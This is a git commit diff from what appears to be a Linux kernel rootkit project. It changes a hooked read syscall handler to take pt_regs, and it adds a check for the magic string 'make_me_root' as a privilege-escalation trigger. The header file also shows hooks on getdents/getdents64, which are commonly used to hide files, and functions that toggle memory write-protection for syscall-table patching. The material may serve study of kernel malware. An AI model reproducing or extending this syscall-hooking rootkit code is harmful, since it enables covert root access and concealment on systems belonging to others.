commit f8ea06a195b7390311b892394deea9e99c73227b
parent 31f64ebd7cdff01f0905b58499c2f54ec2a8bd99
Author: deurzen <m.deurzen@tum.de>
Date: Fri, 27 Nov 2020 17:07:08 +0100
changes signature to take pt_regs, unpacks args
Diffstat:
2 files changed, 12 insertions(+), 6 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -19,7 +19,7 @@ atomic_t read_count;
atomic_t getdents_count;
atomic_t getdents64_count;
-asmlinkage ssize_t (*sys_read)(int, void *, size_t);
+asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
asmlinkage long (*sys_getdents)(const struct pt_regs *);
asmlinkage long (*sys_getdents64)(const struct pt_regs *);
@@ -95,10 +95,16 @@ enable_protection(void)
asmlinkage ssize_t
-g7_read(int fd, void *buf, size_t count)
+g7_read(const struct pt_regs *pt_regs)
{
- DEBUG_INFO("testing g7_read\n");
- return sys_read(fd, buf, count);
+ int fd = (int)pt_regs->di;
+ void *buf = (void *)pt_regs->si;
+ size_t count = (size_t)pt_regs->dx;
+
+ if (!memcmp((const char *)buf, "make_me_root", count))
+ DEBUG_INFO("YEP");
+
+ return sys_read(pt_regs);
}
// https://elixir.bootlin.com/linux/v4.19/source/arch/x86/entry/syscall_64.c
diff --git a/src/hook.h b/src/hook.h
@@ -13,7 +13,7 @@ typedef struct {
void *orig;
} sc_hook_t;
-extern asmlinkage ssize_t (*sys_read)(int, void *, size_t);
+extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents64)(const struct pt_regs *);
@@ -25,7 +25,7 @@ void disable_protection(void);
void enable_protection(void);
// hooks
-asmlinkage ssize_t g7_read(int, void *, size_t);
+asmlinkage ssize_t g7_read(const struct pt_regs *);
asmlinkage long g7_getdents(const struct pt_regs *);
asmlinkage long g7_getdents64(const struct pt_regs *);
